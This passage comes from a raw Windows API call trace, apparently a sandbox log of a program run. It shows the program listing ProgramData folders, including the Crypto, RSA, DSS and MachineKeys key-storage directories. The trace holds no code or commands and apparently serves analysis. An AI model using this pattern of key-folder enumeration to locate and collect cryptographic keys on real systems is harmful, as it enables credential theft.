cFileName="", cAlternateFileName="")) returned 0 [0133.482] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0133.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0133.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0133.484] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpFilePart=0x0) returned 0x34 [0133.484] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpFilePart=0x0) returned 0x35 [0133.484] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.485] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.485] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2436abaa, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xabde2c6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa65a8bbf, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0133.485] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae2660aa, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae2660aa, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0133.485] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae409b6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae409b6f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0133.486] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x79f1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0133.486] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x26353250, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0133.486] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0133.486] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x249fa376, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xd5310, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0133.487] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x249fa376, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xd5310, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 0 [0133.487] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0133.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0133.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0133.488] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x1f [0133.488] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\", lpFilePart=0x0) returned 0x20 [0133.490] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.491] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.491] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSS", cAlternateFileName="")) returned 1 [0133.491] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Keys", cAlternateFileName="")) returned 1 [0133.492] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0133.492] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0133.492] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0133.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0133.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0133.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x1f [0133.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\", lpFilePart=0x0) returned 0x20 [0133.492] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.493] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.493] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSS", cAlternateFileName="")) returned 1 [0133.493] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Keys", cAlternateFileName="")) returned 1 [0133.493] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0133.493] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.494] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0133.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0133.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.494] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS", lpFilePart=0x0) returned 0x23 [0133.494] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\", lpFilePart=0x0) returned 0x24 [0133.494] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.494] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.495] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0133.495] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0133.495] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.496] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS", lpFilePart=0x0) returned 0x23 [0133.496] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\", lpFilePart=0x0) returned 0x24 [0133.496] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.496] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.497] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0133.497] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.497] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.497] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", lpFilePart=0x0) returned 0x2f [0133.497] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\", lpFilePart=0x0) returned 0x30 [0133.498] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.498] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.498] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0133.498] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.499] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", lpFilePart=0x0) returned 0x2f [0133.499] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\", lpFilePart=0x0) returned 0x30 [0133.499] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.499] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.499] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0133.499] FindClose 